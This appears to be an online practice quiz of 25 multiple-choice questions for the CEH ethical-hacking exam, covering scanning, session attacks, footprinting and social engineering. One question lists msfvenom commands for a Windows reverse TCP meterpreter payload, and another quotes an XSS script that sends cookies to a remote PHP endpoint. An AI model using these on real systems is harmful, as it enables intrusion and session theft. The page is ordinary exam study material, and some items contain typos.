Cristian Osvaldo Gómez
Test por , creado hace más de 1 año

test ceh

1124
0
0
Cristian Osvaldo Gómez
Creado por Cristian Osvaldo Gómez hace alrededor de 2 años
Cerrar

Test CEH 2

Pregunta 1 de 25

1

Taylor, a security professional, uses a tool to monitor her company's website, website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • WebSite-Watcher

  • Web-Stat

  • WAFWOOF

  • Webroot

Explicación

Pregunta 2 de 25

1

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?

Selecciona una de las siguientes respuestas posibles:

  • ARP ping scan

  • UDP Scan

  • ACK flag probe scan

  • TCP Maimon scan

Explicación

Pregunta 3 de 25

1

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?

Selecciona una de las siguientes respuestas posibles:

  • White-hat hacking program

  • Vulnerability hunting program

  • Ethical hacking program

  • Bug bounty program

Explicación

Pregunta 4 de 25

1

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney's account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment
details entered in a form are linked to Boney's account. What is the attack performed by Boney in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Session donation attack

  • Session fixation attack

  • forbidden attack

  • CRIME attack

Explicación

Pregunta 5 de 25

1

Henry is a cyber security specialist hired by BlackEye - Cyber Security Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

Selecciona una de las siguientes respuestas posibles:

  • 128

  • 255

  • 64

  • 138

Explicación

Pregunta 6 de 25

1

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?

Selecciona una de las siguientes respuestas posibles:

  • profile

  • xsession-log

  • bash history

  • bashrc

Explicación

Pregunta 7 de 25

1

A DDoS attack is performed at laver 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple requests to complete. Which attack is being described here?
connections and keeps waiting for the

Selecciona una de las siguientes respuestas posibles:

  • Phlashing

  • Slowloris attack

  • Desynchronization

  • Session splicing

Explicación

Pregunta 8 de 25

1

What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?

Selecciona una de las siguientes respuestas posibles:

  • The attacker uses TCP to poison the DNS resolver

  • The attacker makes a request to the DNS resolver

  • The attacker forges a reply from the DNS resolver

  • The attacker queries a nameserver using the DNS resolver

Explicación

Pregunta 9 de 25

1

John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Agent-based scanner

  • Network-based scanner

  • Proxy scanner

  • Cluster scanner

Explicación

Pregunta 10 de 25

1

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

Selecciona una de las siguientes respuestas posibles:

  • mstvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT-4444 -f exe
    > shell.exe

  • msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT-4444 -f exe>
    shell.exe

Explicación

Pregunta 11 de 25

1

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Application assessment

  • Wireless network assessment

  • Distributed assessment

  • Host-based assessment

Explicación

Pregunta 12 de 25

1

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation. Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?

Selecciona una de las siguientes respuestas posibles:

  • HTTPS

  • IP

  • FTPS

  • FTP

Explicación

Pregunta 13 de 25

1

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Towelroot

  • Knative

  • Bluto

  • ZANTI

Explicación

Pregunta 14 de 25

1

In order to tailor your tests during a web-application scan, you decide to determine which the web-server version is hosting the application. On using the sV flag with Nmap, you obtain the following response:
80/tcp open http-proxy Apache Server 7.1.6
What information-gathering technique does this best describe?

Selecciona una de las siguientes respuestas posibles:

  • Banner grabbing

  • Brute forcing

  • Dictionary attack

  • WHOIS lookup

Explicación

Pregunta 15 de 25

1

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs. What type of malware did the attacker use to bypass the company's application whitelisting?

Selecciona una de las siguientes respuestas posibles:

  • File-less malware

  • Phishing malware

  • Logic bomb malware

  • Zero-day malware

Explicación

Pregunta 16 de 25

1

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Hootsuite

  • VisualRoute

  • HULK

  • ophcrack

Explicación

Pregunta 17 de 25

1

Which of the following bluetooth hacking techniques refers to the theft of information from a wireless device through bluetooth?

Selecciona una de las siguientes respuestas posibles:

  • Bluesmacking

  • Bluebugging

  • Bluejacking

  • Bluesnarfing

Explicación

Pregunta 18 de 25

1

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online 2 and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network.
Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

Selecciona una de las siguientes respuestas posibles:

  • nmap -sn -PP < target IP address >

  • nmap -sn-PO < target IP address >

  • nmap -sn-PS< target IP address >

  • nmap -sn-PA < target IP address >

Explicación

Pregunta 19 de 25

1

Which file is a rich target to discover the structure of a website during web-server
footprinting.

Selecciona una de las siguientes respuestas posibles:

  • Index.html

  • robots.txt

  • domain.txt

  • document root

Explicación

Pregunta 20 de 25

1

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script> document.write('<img src="https://localhost/submitcookie.php? cookie ='+
escape(document.cookie) + " />);
</script>
What issue occurred for the users who clicked on the image?

Selecciona una de las siguientes respuestas posibles:

  • This php file silently executes the code and grabs the user's session cookie and session ID.

  • The code is a virus that is attempting to gather the user's username and password.

  • The code injects a new cookie to the browser.

  • The code redirects the user to another site.

Explicación

Pregunta 21 de 25

1

An attacker redirects the victim to malicious websites by sending them a malicious link, by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?

Selecciona una de las siguientes respuestas posibles:

  • Spoofing

  • Vishing

  • DDoS

  • Phishing

Explicación

Pregunta 22 de 25

1

Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Cloud broker

  • Cloud auditor

  • Cloud consume

  • Cloud carrier

Explicación

Pregunta 23 de 25

1

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Phishing

  • Quid pro quo

  • Elicitation

  • Diversion theft

Explicación

Pregunta 24 de 25

1

Jane, an ethical hacker, is testing a target organization's web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site's directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website's directories and gain valuable information. What is the attack technique employed by Jane in the above scenario?

Selecciona una de las siguientes respuestas posibles:

  • Website defacement

  • Web cache poisoning

  • Session hijacking

  • Website mirroring

Explicación

Pregunta 25 de 25

1

Allen, a professional pen tester, was hired by XpertTech Solutions to perform an attack simulation on the organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code
used for obtaining the messenger service running for the logged-in user?

Selecciona una de las siguientes respuestas posibles:

  • <20>

  • <1B>

  • <00>

  • <03>

Explicación